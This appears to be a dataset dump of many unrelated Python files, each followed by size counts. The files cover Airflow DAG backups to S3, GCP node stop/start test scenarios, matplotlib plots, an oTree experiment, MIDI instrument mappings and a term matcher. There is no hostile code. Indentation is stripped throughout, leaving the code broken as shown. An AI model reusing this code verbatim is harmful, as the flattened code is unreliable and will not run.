self.disable()
return self.input
| 3,395 | 1,036 |
import os
import subprocess
from airflow.exceptions import AirflowException
from airflow import configuration as conf
def backup_folder_exists():
import commands
remote_base_path = conf.get('core', 'REMOTE_BASE_LOG_FOLDER')
if not remote_base_path.startswith('s3://'):
raise AirflowException("There seems to be some problem with your defloc location")
remote_loc = remote_base_path + '/dags_backup/'
execute_cmd = 's3cmd ls -c /usr/lib/hustler/s3cfg {} | wc -l'.format(remote_loc)
resp = commands.getoutput(execute_cmd)
if resp != '0':
return True
return False
def untar_and_save_dags(tempDir):
# import tarfile
import commands
airflow_home = os.environ['AIRFLOW_HOME']
if not os.path.exists(airflow_home + "/dags"):
os.makedirs(airflow_home + "/dags")
cmd = "tar -vxzf {}/dags.tar.gz -C {}/dags/".format(tempDir, airflow_home)
commands.getoutput(cmd=cmd)
# tar = tarfile.open(tempDir + '/dags.tar.gz')
# tar.extractall(path = airflow_home + "/dags/")
# for member in tar.getmembers():
# tar.extract(member, airflow_home + '/dags/')
def pull_from_s3(remote_loc, localDir):
execute_cmd = ['s3cmd', 'get', '-c', '/usr/lib/hustler/s3cfg']
execute_cmd.extend([remote_loc, localDir + '/', '--force'])
process = subprocess.Popen(execute_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
def push_to_s3(dags_folder):
remote_base_path = conf.get('core', 'REMOTE_BASE_LOG_FOLDER')
remote_loc = remote_base_path + '/dags_backup/'
execute_cmd = ['s3cmd', 'put', '-c', '/usr/lib/hustler/s3cfg']
execute_cmd.extend(['dags.tar.gz', remote_loc])
process = subprocess.Popen(execute_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.wait()
| 1,802 | 649 |
#!/usr/bin/env python
#-*- coding=utf-8 -*-
def function1():
print "function1 running"
if __name__ == "__main__":
print "mymodule1 running as main program"
else:
print "mymodule1 initializing"
| 209 | 79 |
import matplotlib.pyplot as plt
from scipy.optimize import root
import matplotlib
import numpy as np
def makeFigure1():
def fun(x):
return [(x[0]**qq)/(1+x[0]**qq) - bb*x[0]]
b = [0.4,0.3,0.2,0.1]
q = [2.5,3,3.5,4]
x = np.arange(0,2.6,0.1)
y = np.zeros(len(x))
cmap = matplotlib.cm.get_cmap('RdYlGn')
fig = plt.figure()
ax = fig.add_subplot(2,1,1)
# for b = 0.4, plot different values of q
colors = []
for i in range(len(b)):
colors.append(cmap(0.25*(i+1)))
lines=[]
line1, = ax.plot(x,b[0]*x,c='k', linewidth=2)
lines.append(line1)
for j in range(len(q)):
for i in range(len(x)):
y[i] = x[i]**q[j]/(1+x[i]**q[j])
line1, = ax.plot(x, y, c = colors[j], linewidth=2)
lines.append(line1)
bb = b[0]
qq = q[j]
soln = root(fun,1.0)
lines.append(ax.scatter(soln.x,b[0]*soln.x,facecolor='none',edgecolor='k',s=30))
soln = root(fun,2.5)
lines.append(ax.scatter(soln.x,b[0]*soln.x,facecolor='k',edgecolor='k',s=30))
lines.append(ax.scatter(0,0,facecolor='k',edgecolor='k',s=30))
legend1 = plt.legend([lines[0], lines[1], lines[4], lines[7], lines[10]],\
['b = 0.4', 'q = 2.5', 'q = 3.0', 'q = 3.5', 'q = 4.0'], loc='lower right')
plt.setp(legend1.get_title(),fontsize=14)
plt.gca().add_artist(legend1)
plt.legend([lines[3], lines[2]],['Stable Equilibria','Unstable Equilibria'],loc='upper left')
ax.set_ylabel('Fluxes of P',fontsize=16)
ax.tick_params(axis='y',labelsize=14)
ax.set_xlim(0,2.5)
ax.set_ylim(0,1)
ax.set_title('a) Effect of q on Lake Dynamics',loc='left')
ax = fig.add_subplot(2,1,2)
colors = []
for i in range(len(b)):
colors.append(cmap(1-(0.25*i)))
#for q = 2.5, plot different values of b
for i in range(len(x)):
y[i] = x[i]**q[0]/(1+x[i]**q[0])
lines = []
line1, = ax.plot(x,y,c='k',label='q = ' + str(q[0]),linewidth=2)
lines.append(line1)
for i in range(len(b)):
line1, = ax.plot(x,b[i]*x,c=colors[i],label='b = ' + str(b[i]),linewidth=2)
lines.append(line1)
bb = b[i]
qq = q[0]
soln = root(fun,1.0)
lines.append(ax.scatter(soln.x,b[i]*soln.x,facecolor='none',edgecolor='k',s=30))
soln = root(fun,2.5)
lines.append(ax.scatter(soln.x,b[i]*soln.x,facecolor='k',edgecolor='k',s=30))
lines.append(ax.scatter(0,0,facecolor='k',edgecolor='k',s=30))
ax.legend([lines[0], lines[1], lines[4], lines[7], lines[10]],\
['q = 2.5', 'b = 0.4', 'b = 0.3', 'b = 0.2', 'b = 0.1'],\
scatterpoints = 1, loc='upper left')
ax.set_xlabel('Lake P Concentration,$X_t$',fontsize=16)
ax.set_ylabel('Fluxes of P',fontsize=16)
ax.tick_params(axis='both',labelsize=14)
ax.set_xlim(0,2.5)
ax.set_ylim(0,1)
ax.set_title('b) Effect of b on Lake Dynamics',loc='left')
fig.set_size_inches([8,11.85])
fig.savefig('Figure1.pdf')
fig.clf()
return None
makeFigure1() | 3,223 | 1,455 |
import sys
import time
from googleapiclient import discovery
from oauth2client.client import GoogleCredentials
import logging
class gcp_node_scenarios():
def __init__(self, project):
self.project = project
logging.info("project " + str(self.project) + "!")
credentials = GoogleCredentials.get_application_default()
self.client = discovery.build('compute', 'v1', credentials=credentials,
cache_discovery=False)
# Node scenario to stop the node
def node_stop_scenario(self, node):
logging.info('stop scenario')
try:
logging.info("Starting node_stop_scenario injection")
instance_id, zone = self.get_instance_id(node)
logging.info("Stopping the node %s with instance ID: %s " % (node, instance_id))
self.stop_instances(zone, instance_id)
self.wait_until_stopped(zone, instance_id, 80)
logging.info("Node with instance ID: %s is in stopped state" % instance_id)
except Exception as e:
logging.error("Failed to stop node instance. Encountered following exception: %s. "
"Test Failed" % (e))
logging.error("node_stop_scenario injection failed!")
sys.exit(1)
# Node scenario to start the node
def node_start_scenario(self, node):
try:
logging.info("Starting node_start_scenario injection")
instance_id, zone = self.get_instance_id(node)
logging.info("Starting the node %s with instance ID: %s " % (node, instance_id))
self.start_instances(zone, instance_id)
self.wait_until_running(zone, instance_id, 80)
logging.info("Node with instance ID: %s is in running state" % instance_id)
logging.info("node_start_scenario has been successfully injected!")
except Exception as e:
logging.error("Failed to start node instance. Encountered following "
"exception: %s. Test Failed" % (e))
logging.error("node_start_scenario injection failed!")
sys.exit(1)
# Get the instance ID of the node
def get_instance_id(self, node):
zone_request = self.client.zones().list(project=self.project)
while zone_request is not None:
zone_response = zone_request.execute()
for zone in zone_response['items']:
instances_request = self.client.instances().list(project=self.project,
zone=zone['name'])
while instances_request is not None:
instance_response = instances_request.execute()
if "items" in instance_response.keys():
for instance in instance_response['items']:
if instance['name'] in node:
return instance['name'], zone['name']
instances_request = self.client.zones().list_next(
previous_request=instances_request,
previous_response=instance_response)
zone_request = self.client.zones().list_next(previous_request=zone_request,
previous_response=zone_response)
logging.info('no instances ')
# Start the node instance
def start_instances(self, zone, instance_id):
self.client.instances().start(project=self.project, zone=zone, instance=instance_id) \
.execute()
# Stop the node instance
def stop_instances(self, zone, instance_id):
self.client.instances().stop(project=self.project, zone=zone, instance=instance_id) \
.execute()
# Get instance status
def get_instance_status(self, zone, instance_id, expected_status, timeout):
# statuses: PROVISIONING, STAGING, RUNNING, STOPPING, SUSPENDING, SUSPENDED, REPAIRING,
# and TERMINATED.
i = 0
sleeper = 5
while i <= timeout:
instStatus = self.client.instances().get(project=self.project, zone=zone,
instance=instance_id).execute()
logging.info("Status of vm " + str(instStatus['status']))
if instStatus['status'] == expected_status:
return True
time.sleep(sleeper)
i += sleeper
logging.info("Status of %s was not %s in a")
# Wait until the node instance is running
def wait_until_running(self, zone, instance_id, timeout):
self.get_instance_status(zone, instance_id, 'RUNNING', timeout)
# Wait until the node instance is stopped
def wait_until_stopped(self, zone, instance_id, timeout):
self.get_instance_status(zone, instance_id, 'TERMINATED', timeout) | 4,882 | 1,278 |
from otree.api import *
import itertools
doc = """
Within-subject design, with three treatment conditions. Orders of the treatment
will be balanced as long as the subjects arrive in multiples of 6.
"""
class C(BaseConstants):
NAME_IN_URL = 'balanced_treatment_within_subject'
PLAYERS_PER_GROUP = None
# On treatment and how they repeat
NUM_Repeated_Rounds_Treatment_Condition = 10
NUM_Treatment_Conditions = 3
# On what to show before/after the rounds
NUM_LeaderPage = 1
NUM_FinishPage = 1
# Welcome page + ROUNDS + Results page
NUM_ROUNDS = (
NUM_LeaderPage # Start page
+ NUM_Treatment_Conditions #Intro for each treatment
+ NUM_Repeated_Rounds_Treatment_Condition * NUM_Treatment_Conditions
+ NUM_FinishPage # Finish page
)
ROUNDS_for_TreatmentIntro = [
# Here, name the rounds in which TreatmentIntro needs to be displayed
(NUM_LeaderPage + 1),
# Then,
(
NUM_LeaderPage + 1 + NUM_Repeated_Rounds_Treatment_Condition
+ 1),
(
NUM_LeaderPage + 1 + NUM_Repeated_Rounds_Treatment_Condition
+ 1 + NUM_Repeated_Rounds_Treatment_Condition + 1)
]
FULL_list_of_rounds = list(range(1,NUM_ROUNDS + 1))
ROUNDS_for_T1 = FULL_list_of_rounds[ROUNDS_for_TreatmentIntro[0] : ROUNDS_for_TreatmentIntro[0] + NUM_Repeated_Rounds_Treatment_Condition]
ROUNDS_for_T2 = FULL_list_of_rounds[ROUNDS_for_TreatmentIntro[1] : ROUNDS_for_TreatmentIntro[1] + NUM_Repeated_Rounds_Treatment_Condition]
ROUNDS_for_T3 = FULL_list_of_rounds[ROUNDS_for_TreatmentIntro[2] : ROUNDS_for_TreatmentIntro[2] + NUM_Repeated_Rounds_Treatment_Condition]
ROUND_for_FinishPage = NUM_ROUNDS
# Parameters of the simple demand function
# print(ROUNDS_for_TreatmentIntro)
# print(ROUNDS_for_T1)
# print(ROUNDS_for_T2)
# print(ROUNDS_for_T3)
class Subsession(BaseSubsession):
pass
def creating_session(subsession: Subsession):
treatments = itertools.cycle(
itertools.permutations([1,2,3])
)
if subsession.round_number == 1:
for p in subsession.get_players():
treatment = next(treatments)
# print('treatment is', treatment)
p.participant.treatment_sequence = treatment # Log the assigned treatment ordering
class Group(BaseGroup):
pass
class Player(BasePlayer):
treatment_sequence = models.StringField()
worker_page_choice = models.BooleanField(initial=0)
# PAGES
class WelcomePage(Page):
def vars_for_template(player):
return dict(
num_of_treatments = C.NUM_Treatment_Conditions,
num_of_repeats = C.NUM_Repeated_Rounds_Treatment_Condition,
total_rounds = C.NUM_ROUNDS
)
@staticmethod
def is_displayed(player: Player):
return player.round_number <= C.NUM_LeaderPage
def before_next_page(player : Player, timeout_happened):
player.treatment_sequence = "-".join([str(T) for T in player.participant.treatment_sequence])
class ExpConditionIntro(Page):
def vars_for_template(player):
# Decide current treatment by treatment_sequence and round_number
# This could have been a player method
if player.round_number == C.ROUNDS_for_TreatmentIntro[0]:
treatment_for_round = player.participant.treatment_sequence[0]
elif player.round_number == C.ROUNDS_for_TreatmentIntro[1]:
treatment_for_round = player.participant.treatment_sequence[1]
elif player.round_number == C.ROUNDS_for_TreatmentIntro[2]:
treatment_for_round = player.participant.treatment_sequence[2]
return dict(
treatment_for_round = treatment_for_round,
sequence = player.participant.treatment_sequence # for diagnostics only. Remove for production.
)
pass
@staticmethod
def is_displayed(player: Player):
if player.round_number in C.ROUNDS_for_TreatmentIntro:
return True
class WorkerPage(Page):
def vars_for_template(player):
# Decide current treatment by treatment_sequence and round_number
# This could have been a player method
if player.round_number in C.ROUNDS_for_T1:
rounds_under_same_treatment = C.ROUNDS_for_T1
treatment_for_round = player.participant.treatment_sequence[0]
elif player.round_number in C.ROUNDS_for_T2:
rounds_under_same_treatment = C.ROUNDS_for_T2
treatment_for_round = player.participant.treatment_sequence[1]
print("Found you")
elif player.round_number in C.ROUNDS_for_T3:
rounds_under_same_treatment = C.ROUNDS_for_T3
treatment_for_round = player.participant.treatment_sequence[2]
else:
print(player.round_number)
print(C.ROUNDS_for_T2)
# Then, report the current page number, as a progress indicator
round_count_out_of_Total = rounds_under_same_treatment.index(player.round_number) + 1
return dict(
treatment_for_round = treatment_for_round,
round_count_out_of_Total = round_count_out_of_Total
)
@staticmethod
def is_displayed(player: Player):
if player.round_number in C.ROUNDS_for_T1:
return True
elif player.round_number in C.ROUNDS_for_T2:
return True
elif player.round_number in C.ROUNDS_for_T3:
return True
class Results(Page):
@staticmethod
def is_displayed(player: Player):
if player.round_number == C.ROUND_for_FinishPage:
return True
page_sequence = [WelcomePage, ExpConditionIntro, WorkerPage, Results]
| 6,004 | 1,945 |
# mathematical operations
first_value = 5
second_value = 4
sum = first_value + second_value
difference = first_value - second_value
product = first_value * second_value
quotient = first_value / second_value
modulus = first_value % second_value
exponent = first_value ** second_value
print('Sum: ' + str(sum))
print('Difference: ' + str(difference))
print('Product: ' + str(product))
print('Quotient: ' + str(quotient))
print('Modulus: ' + str(modulus))
print('Exponent: ' + str(exponent))
# control the default order of operations
print(3 + 4 * 5)
print((3 + 4) * 5)
# investigate division
first_value = 5
second_value = 4
quotient = first_value / second_value
print(type(quotient))
print(quotient)
# convert a float into an int
pi = 3.14
print(type(pi))
print(int(pi))
uptime = 99.99
print(type(uptime))
print(int(uptime))
# round the number
pi = 3.14
print(type(pi))
print(int(pi))
print(round(pi))
uptime = 99.99
print(type(uptime))
print(int(uptime))
print(round(uptime))
# rounds to a specific decimal place
first_value = round(7.654321, 2)
print(first_value)
second_value = round(9.87654, 3)
print(second_value) | 1,130 | 428 |
import numpy as np
from sklearn.cluster import KMeans
class DiscretizeParam(object):
feature_name = None
discretize_function = None
buckets_amount = None
def __init__(self, feature_name, discretize_function, buckets_amount):
self.feature_name = feature_name
self.discretize_function = discretize_function
self.buckets_amount = buckets_amount
def __repr__(self):
return "DP<{}, {}, {}>".format(self.feature_name, self.discretize_function.__name__, self.buckets_amount)
class Discretizer(object):
bucket_models = {}
frequency_models = {}
kmean_models = {}
def bucket_discretize(dataset_name, feature_name, values, current_value, buckets):
key = (dataset_name, feature_name, buckets)
if not key in Discretizer.bucket_models.keys():
min_value = min(values)
max_value = max(values)
Discretizer.bucket_models[key] = np.linspace(min_value, max_value, buckets)
bins = Discretizer.bucket_models[key]
idx = np.digitize(current_value, bins)
return idx
def frequency_discretize(dataset_name, feature_name, values, current_value, buckets):
key = (dataset_name, feature_name, buckets)
if not key in Discretizer.frequency_models.keys():
split = np.array_split(np.sort(values), buckets)
cutoffs = [x[-1] for x in split]
cutoffs = cutoffs[:-1]
Discretizer.frequency_models[key] = cutoffs
cutoffs = Discretizer.frequency_models[key]
idx = np.digitize(current_value, cutoffs, right=True)
return idx
def kbins_discretize(dataset_name, feature_name, values, current_value, buckets):
key = (dataset_name, feature_name, buckets)
if not key in Discretizer.kmean_models.keys():
values2D = np.array([[v, 0] for v in values])
Discretizer.kmean_models[key] = KMeans(n_clusters=buckets, random_state=0).fit(values2D)
kmeans = Discretizer.kmean_models[key]
curr_val2D = np.array([[current_value, 0]])
val = kmeans.predict(curr_val2D)
return val[0]
| 2,085 | 718 |
import unittest
from trader.binanceCom import BinanceCom
class TestBinanceCom(unittest.TestCase):
def test_connect_to_account(self):
bc = BinanceCom()
self.assertIsNotNone(bc.connect_to_account(bc.default_Key, bc.default_Secret))
self.assertRaises(ValueError, bc.connect_to_account, None, None)
def test_get_coin_info(self):
bc = BinanceCom()
client=bc.connect_to_account(bc.default_Key, bc.default_Secret)
coin_info = bc.get_coin_info(client, "BTCUSDT")
self.assertTrue('symbol' in coin_info)
self.assertTrue('lastPrice' in coin_info)
self.assertTrue('openPrice' in coin_info)
self.assertTrue('volume' in coin_info)
self.assertTrue('highPrice' in coin_info)
self.assertTrue('lowPrice' in coin_info)
if __name__ == '__main__':
unittest.main() | 875 | 294 |
# Copyright 2020 Jack Spencer Smith.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from enum import Enum
class Family(Enum):
BASS = 0
BRASS = 1
FLUTE = 2
GUITAR = 3
KEYBOARD = 4
MALLET = 5
ORGAN = 6
REED = 7
STRING = 8
SYNTH_LEAD = 9
VOCAL = 10
OTHER = 11
DRUMS = 12
midi_instrument_to_family = collections.defaultdict(lambda: Family.OTHER)
midi_instrument_to_family.update({
0: Family.KEYBOARD,
1: Family.KEYBOARD,
2: Family.KEYBOARD,
3: Family.KEYBOARD,
4: Family.KEYBOARD,
5: Family.KEYBOARD,
6: Family.KEYBOARD,
7: Family.KEYBOARD,
8: Family.MALLET,
9: Family.MALLET,
10: Family.MALLET,
11: Family.MALLET,
12: Family.MALLET,
13: Family.MALLET,
14: Family.MALLET,
15: Family.MALLET,
16: Family.ORGAN,
17: Family.ORGAN,
18: Family.ORGAN,
19: Family.ORGAN,
20: Family.ORGAN,
21: Family.ORGAN,
22: Family.ORGAN,
23: Family.ORGAN,
24: Family.GUITAR,
25: Family.GUITAR,
26: Family.GUITAR,
27: Family.GUITAR,
28: Family.GUITAR,
29: Family.GUITAR,
30: Family.GUITAR,
31: Family.GUITAR,
32: Family.BASS,
33: Family.BASS,
34: Family.BASS,
35: Family.BASS,
36: Family.BASS,
37: Family.BASS,
38: Family.BASS,
39: Family.BASS,
40: Family.STRING,
41: Family.STRING,
42: Family.STRING,
43: Family.STRING,
44: Family.STRING,
45: Family.STRING,
46: Family.STRING,
47: Family.STRING, # TIMPANI?
48: Family.STRING,
49: Family.STRING,
50: Family.STRING,
51: Family.STRING,
52: Family.VOCAL,
53: Family.VOCAL,
54: Family.VOCAL,
55: Family.STRING, # orch hit
56: Family.BRASS,
57: Family.BRASS,
58: Family.BRASS,
59: Family.BRASS,
60: Family.BRASS,
61: Family.BRASS,
62: Family.BRASS,
63: Family.BRASS,
64: Family.REED,
65: Family.REED,
66: Family.REED,
67: Family.REED,
68: Family.REED,
69: Family.REED,
70: Family.REED,
71: Family.REED,
72: Family.FLUTE,
73: Family.FLUTE,
74: Family.FLUTE,
75: Family.FLUTE,
76: Family.FLUTE,
77: Family.FLUTE,
78: Family.FLUTE,
79: Family.FLUTE,
80: Family.SYNTH_LEAD,
81: Family.SYNTH_LEAD,
82: Family.SYNTH_LEAD,
83: Family.SYNTH_LEAD,
84: Family.SYNTH_LEAD,
85: Family.VOCAL,
86: Family.SYNTH_LEAD,
87: Family.SYNTH_LEAD,
105: Family.GUITAR,
106: Family.GUITAR,
107: Family.GUITAR,
108: Family.GUITAR,
109: Family.MALLET,
110: Family.REED,
111: Family.STRING,
112: Family.REED,
113: Family.MALLET,
114: Family.MALLET,
})
family_to_midi_instrument = {
0: 33, # Acoustic Bass
1: 57, # Trumpet
2: 74, # Flute
3: 25, # Acoustic Nylon Guitar
4: 1, # keyboard / Acoustic Grand Piano
5: 9, # mallet / Celesta
6: 17, # organ / Drawbar Organ
7: 66, # reed / Alto Sax
8: 49, # string / String Ensemble
9: 83, # synth lead / Square
10: 54, # vocal / Voice Oohs
11: 118,
12: 119, # TODO actual percussion
}
| 3,652 | 1,623 |
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
#
# ==============================================================================
# Authors: Patrick Lehmann
#
# Python Package: Saves the pyIPCMI configuration as python source code.
#
# License:
# ==============================================================================
# Copyright 2017-2018 Patrick Lehmann - Bötzingen, Germany
# Copyright 2007-2016 Technische Universität Dresden - Germany
# Chair of VLSI-Design, Diagnostics and Architecture
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
from lib.ExtendedConfigParser import ExtendedConfigParser
from pyIPCMI.Base.Logging import ILogable
__api__ = [
'IHost'
]
__all__ = __api__
class IHost(ILogable):
"""This is a type hint class (interface description) for a host instance.
It's needed until pyIPCMI requires Python 3.6.
"""
# instance fields
Platform = "string"
Config = ExtendedConfigParser()
# methods
def SaveAndReloadConfiguration(self): pass
# Syntax not supported by Python 3.5 -> requires 3.6
# Platform : str = None
# Config : ExtendedConfigParser = None
| 1,898 | 556 |
from goopylib.imports import *
window = Window(title="Test Window", width=700, height=700, bk_colour=ColourRGB(40, 40, 40))
Circle([350, 350], 10).draw(window)
while window.is_open():
window.update()
| 207 | 92 |
import unittest
from project import group_s
from project import printer_s
from project import member_s
from pyactor.context import set_context, create_host, shutdown, sleep
class TestGroup(unittest.TestCase):
def setUp(self):
# Gets executed before every test
set_context()
self.h = create_host()
self.p = self.h.spawn('printer', printer_s.Printer)
self.g = self.h.spawn('group', group_s.Group, [self.p])
def tearDown(self):
# Gets executed after every test
shutdown()
def test_members_leave(self):
# Test if members join and leave correctly if not announced
m1 = self.h.spawn('m1', member_s.Member, [self.p, self.g])
self.g.join(m1)
self.g.init_start()
self.assertTrue(len(self.g.get_members()) == 1)
sleep(12)
#Test that if no announces are made by the peer, it gets kicked out
self.assertTrue(len(self.g.get_members()) == 0)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestStringMethods)
unittest.TextTestRunner(verbosity=2).run(suite)
| 1,123 | 365 |
# Package: largescale.src.neuron.neuron
from neuron import NeuronGroup
from neuron import T_EXCITATORY, T_INHIBITORY, T_EXC, T_E, T_INH, T_I
from neuron import T_ON, T_OFF, T_O, T_F
| 188 | 89 |
# coding: utf8
import os
BASE_URL = 'http://jsonplaceholder.typicode.com'
SKIP_REAL = os.getenv('SKIP_REAL', False) # 一般会考虑本地开发环境一些测试跳过,所以设置一个全局变量 | 147 | 88 |
from os import getcwd
from os.path import isfile
from os.path import join
from os import listdir
from datetime import datetime
# Obrigado Fabrício por me mostrar como criar um log em python e por ser um
# colega incrível :)
def filelog(name, desc):
# print("ENTROU")
if name == "PY_F":
path_way = getcwd()
path_logs = path_way + "/results/log_py/ERROR"
if name == "PY_S":
path_way = getcwd()
path_logs = path_way + "/results/log_py/SUCCESS"
if name == "RF":
path_way = getcwd()
path_logs = path_way + "/results/log_rf/"
# Obtem a data atual e hora
data = datetime.now().strftime("%d-%m-%Y")
data_hora = datetime.now().strftime("%d-%m-%Y__%H:%M:%S")
if (len(listdir(path_logs)) != 0):
onlyfiles = [f for f in listdir(path_logs) if isfile(join(path_logs, f))]
if (True in [True for x in onlyfiles if (data in x)]):
with open(join(path_logs,"CHARLIE_"+ data + ".txt"), "a") as file:
file.write(data_hora+" : " + desc + '\n')
return
with open(join(path_logs,"CHARLIE_"+ data + ".txt"), "a") as file:
file.write("|===================================================|\n" +
"|\t\t\t\t PROJEKT CHARLIE \t\t\t\t\t|\n" + # pov: cursed python
"|===================================================|\n\n\n" +
data_hora + " : " + desc + '\n')
return | 1,458 | 500 |
from idunn.places import PjApiPOI
from idunn.places.models import pj_info
def test_categories_pj():
poi = PjApiPOI(pj_info.Response(**{"categories": []}))
assert poi.get_class_name() is None
assert poi.get_subclass_name() is None
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "restaurants"}]}))
assert poi.get_class_name() == "restaurant"
assert poi.get_subclass_name() == "restaurant"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "hôtels"}]}))
assert poi.get_class_name() == "lodging"
assert poi.get_subclass_name() == "lodging"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "salles de cinéma"}]}))
assert poi.get_class_name() == "cinema"
assert poi.get_subclass_name() == "cinema"
poi = PjApiPOI(
pj_info.Response(**{"categories": [{"category_name": "salles de concerts, de spectacles"}]})
)
assert poi.get_class_name() == "theatre"
assert poi.get_subclass_name() == "theatre"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "Pharmacie"}]}))
assert poi.get_class_name() == "pharmacy"
assert poi.get_subclass_name() == "pharmacy"
poi = PjApiPOI(
pj_info.Response(**{"categories": [{"category_name": "supermarchés, hypermarchés"}]})
)
assert poi.get_class_name() == "supermarket"
assert poi.get_subclass_name() == "supermarket"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "banques"}]}))
assert poi.get_class_name() == "bank"
assert poi.get_subclass_name() == "bank"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "cafés, bars"}]}))
assert poi.get_class_name() == "bar"
assert poi.get_subclass_name() == "bar"
poi = PjApiPOI(
pj_info.Response(**{"categories": [{"category_name": "des supers écoles de fou"}]})
)
assert poi.get_class_name() == "school"
assert poi.get_subclass_name() == "school"
poi = PjApiPOI(
pj_info.Response(
**{
"categories": [
{"category_name": "grandes études"},
{"category_name": "ou bien l'enseignement supérieur"},
]
}
)
)
assert poi.get_class_name() == "college"
assert poi.get_subclass_name() == "college"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": " Psychologue "}]}))
assert poi.get_class_name() == "doctors"
assert poi.get_subclass_name() == "doctors"
poi = PjApiPOI(pj_info.Response(**{"categories": [{"category_name": "vétérinaires"}]}))
assert poi.get_class_name() == "veterinary"
assert poi.get_subclass_name() == "veterinary"
poi = PjApiPOI(
pj_info.Response(
**{
"categories": [
{"category_name": "unrelated category"},
{"category_name": "garages automobiles"},
]
}
)
)
assert poi.get_class_name() == "car"
assert poi.get_subclass_name() == "car_repair"
| 3,098 | 1,087 |
# coding: utf-8
from django.utils.translation import ugettext as _
from django.db import models
from django.core.urlresolvers import reverse
from django.utils import timezone
class Firm(models.Model):
"Simple firm database."
name = models.CharField(max_length=60, verbose_name=_('firm name'))
periode = models.IntegerField(default=1,
verbose_name=_('periode [months]'),
help_text=_('How often we make an invoice.'))
from_date = models.DateField(default=timezone.now, verbose_name=_('from date'))
description = models.TextField(blank=True, verbose_name=_('description'))
show_in_list = models.BooleanField(default=True, verbose_name=_('show in list'))
def get_absolute_url(self):
return reverse('work_evid:firm_detail', kwargs={'pk': self.pk})
class Meta:
ordering = ['name']
verbose_name = _('firm')
def __str__(self):
return self.name
class Work(models.Model):
"Work evidence model."
firm = models.ForeignKey(Firm, verbose_name=_('firm'))
date = models.DateField(default=timezone.now, verbose_name=_('work date'))
item_price = models.DecimalField(max_digits=15,
decimal_places=2,
verbose_name=_('price for item'))
items = models.DecimalField(max_digits=10,
decimal_places=2,
default=1,
verbose_name=_('ammount of items'))
what_brief = models.CharField(max_length=80, verbose_name=_('what (briefly)'))
what_detailed = models.TextField(blank=True, verbose_name=_('describe detailed'))
@property
def full_price(self):
"Returns item price multiplied by ammount."
return self.items * self.item_price
#full_price = property(_get_full_price)
def get_absolute_url(self):
return reverse('work_evid:work_detail', kwargs={'pk': self.pk})
class Meta:
ordering = ['-date']
class Todo(models.Model):
firm = models.ForeignKey(Firm, verbose_name=_('firm'))
date = models.DateField(default=timezone.now, verbose_name=_('created'))
todo = models.TextField(blank=True, verbose_name=_('todo'))
finished = models.BooleanField(default=False, verbose_name=_('finished'))
def __str__(self):
return '{0} {1} {2}'.format(self.date, self.firm[:12], self.todo[:40])
def get_absolute_url(self):
return reverse('work_evid:todo_detail', kwargs={'pk': self.pk})
class Meta:
ordering = ['finished', '-date']
| 2,631 | 805 |
import asyncio
from asyncio.events import AbstractEventLoop
from unittest import TestCase
from unittest.mock import Mock, MagicMock
from cadence.decision_loop import ReplayDecider, ITask
from cadence.tests.test_decision_context import run_once
class TestAwaitTill(TestCase):
def setUp(self) -> None:
self.event_loop: AbstractEventLoop = asyncio.get_event_loop()
self.decider: ReplayDecider = Mock()
self.decider.get_and_increment_next_id = MagicMock(return_value="0")
self.decider.event_loop = Mock()
self.future = self.event_loop.create_future()
self.decider.event_loop.create_future = MagicMock(return_value=self.future)
self.itask = ITask(decider=self.decider)
def tearDown(self) -> None:
self.task.cancel()
def test_await_till(self):
self.task = self.event_loop.create_task(self.itask.await_till(lambda *args: None))
run_once(self.event_loop)
assert self.itask.awaited
def test_await_till_no_progress(self):
self.task = self.event_loop.create_task(self.itask.await_till(lambda *args: None))
run_once(self.event_loop)
assert self.itask.awaited
run_once(self.event_loop)
assert self.itask.awaited
def test_unblock(self):
blocked = True
def check_blocked():
nonlocal blocked
return not blocked
self.task = self.event_loop.create_task(self.itask.await_till(check_blocked))
run_once(self.event_loop)
blocked = False
self.itask.unblock()
run_once(self.event_loop)
assert not self.itask.awaited
| 1,638 | 532 |
from dataclasses import dataclass
from typing import List
from .matching import (
ConstantOpBuilder, Context, Matchable, PatternBuilder, VarOpBuilder
)
class Term(Matchable['TermOp']):
pass
@dataclass
class Val(Term):
value: str
def handle_match_op(self, op: 'TermOp', ctx: Context['TermOp']) -> bool:
return op.handle_val(self, ctx)
@dataclass
class Func(Term):
name: str
args: List[Term]
def handle_match_op(self, op: 'TermOp', ctx: Context['TermOp']) -> bool:
return op.handle_func(self, ctx)
class TermOp:
def handle_term(self, term: Term, ctx: Context['TermOp']) -> bool:
return False
def handle_func(self, term: Func, ctx: Context['TermOp']) -> bool:
return self.handle_term(term, ctx)
def handle_val(self, term: Val, ctx: Context['TermOp']) -> bool:
return self.handle_term(term, ctx)
class MatchFunc(TermOp):
def __init__(self, name: str, arity: int):
self.name = name
self.arity = arity
def handle_func(self, term: Func, ctx: Context[TermOp]) -> bool:
if self.name != term.name or self.arity != len(term.args):
return False
ctx.push_terms(reversed(term.args))
return True
class MatchVal(TermOp):
def __init__(self, value: str):
self.value = value
